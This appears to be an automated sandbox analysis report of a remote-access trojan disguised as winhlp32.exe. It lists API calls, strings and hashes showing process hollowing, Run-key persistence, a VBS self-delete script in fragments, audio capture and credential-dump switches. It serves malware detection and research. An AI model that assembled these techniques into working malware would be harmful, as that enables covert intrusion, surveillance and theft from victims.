                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                    • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                    • ResumeThread.KERNEL32(?), ref: 00418435
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                    • GetLastError.KERNEL32 ref: 0041847A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                    • API String ID: 4188446516-3035715614
                                    • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                    • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                    • ExitProcess.KERNEL32 ref: 0040D7D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-332907002
                                    • Opcode ID: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                    • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                    • Opcode Fuzzy Hash: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                    • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                    • ExitProcess.KERNEL32 ref: 0040D419
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                    • API String ID: 3797177996-2557013105
                                    • Opcode ID: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                    • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                    • Opcode Fuzzy Hash: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                    • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                    • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                    • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                    • GetCurrentProcessId.KERNEL32 ref: 00412541
                                    • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                    • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                    • Sleep.KERNEL32(000001F4), ref: 00412682
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                    • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                    • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                                    • API String ID: 2649220323-436679193
                                    • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                    • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                    • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                    • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                    • SetEvent.KERNEL32 ref: 0041B219
                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                    • CloseHandle.KERNEL32 ref: 0041B23A
                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                    • API String ID: 738084811-2094122233
                                    • Opcode ID: c42a5703fedf08c3cbbd1e5038eee64118d9e3bd0f02047e83a30d8489e39581
                                    • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                    • Opcode Fuzzy Hash: c42a5703fedf08c3cbbd1e5038eee64118d9e3bd0f02047e83a30d8489e39581
                                    • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Write$Create
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1602526932-4212202414
                                    • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                    • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\winhlp32.exe,00000001,0040764D,C:\Windows\winhlp32.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: C:\Windows\winhlp32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                    • API String ID: 1646373207-2557295206
                                    • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                    • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _wcslen.LIBCMT ref: 0040CE07
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                    • CopyFileW.KERNEL32(C:\Windows\winhlp32.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                    • _wcslen.LIBCMT ref: 0040CEE6
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                    • CopyFileW.KERNEL32(C:\Windows\winhlp32.exe,00000000,00000000), ref: 0040CF84
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                    • _wcslen.LIBCMT ref: 0040CFC6
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                    • ExitProcess.KERNEL32 ref: 0040D062
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                    • String ID: 6$C:\Windows\winhlp32.exe$del$open
                                    • API String ID: 1579085052-621878215
                                    • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                    • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                    • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                    • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • lstrlenW.KERNEL32(?), ref: 0041C036
                                    • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                    • lstrlenW.KERNEL32(?), ref: 0041C067
                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                    • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                    • _wcslen.LIBCMT ref: 0041C13B
                                    • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                    • GetLastError.KERNEL32 ref: 0041C173
                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                    • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                    • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                    • GetLastError.KERNEL32 ref: 0041C1D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                    • String ID: ?
                                    • API String ID: 3941738427-1684325040
                                    • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                    • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                    • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                    • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$EnvironmentVariable$_wcschr
                                    • String ID:
                                    • API String ID: 3899193279-0
                                    • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                    • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                    • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                    • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                    • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                    • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                    • Sleep.KERNEL32(00000064), ref: 00412E94
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                    • String ID: /stext "$0TG$0TG$NG$NG
                                    • API String ID: 1223786279-2576077980
                                    • Opcode ID: 6e29699190e6674568e17b62b3cbc9041562105630a2a1f1bbf1f9ebd5142883
                                    • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                    • Opcode Fuzzy Hash: 6e29699190e6674568e17b62b3cbc9041562105630a2a1f1bbf1f9ebd5142883
                                    • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                    • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                    • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                    • API String ID: 2490988753-744132762
                                    • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                    • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                    • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                    • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                    • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                    • API String ID: 1332880857-3714951968
                                    • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                    • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                    • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                    • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                    • GetCursorPos.USER32(?), ref: 0041D5E9
                                    • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                    • ExitProcess.KERNEL32 ref: 0041D665
                                    • CreatePopupMenu.USER32 ref: 0041D66B
                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                    • String ID: Close
                                    • API String ID: 1657328048-3535843008
                                    • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                    • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                    • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                    • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$Info
                                    • String ID:
                                    • API String ID: 2509303402-0
                                    • Opcode ID: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                                    • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                    • Opcode Fuzzy Hash: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                                    • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
